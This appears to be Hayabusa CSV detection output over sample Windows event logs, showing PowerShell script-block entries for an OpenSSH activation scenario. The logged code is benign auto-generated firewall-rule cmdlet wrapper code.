19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 
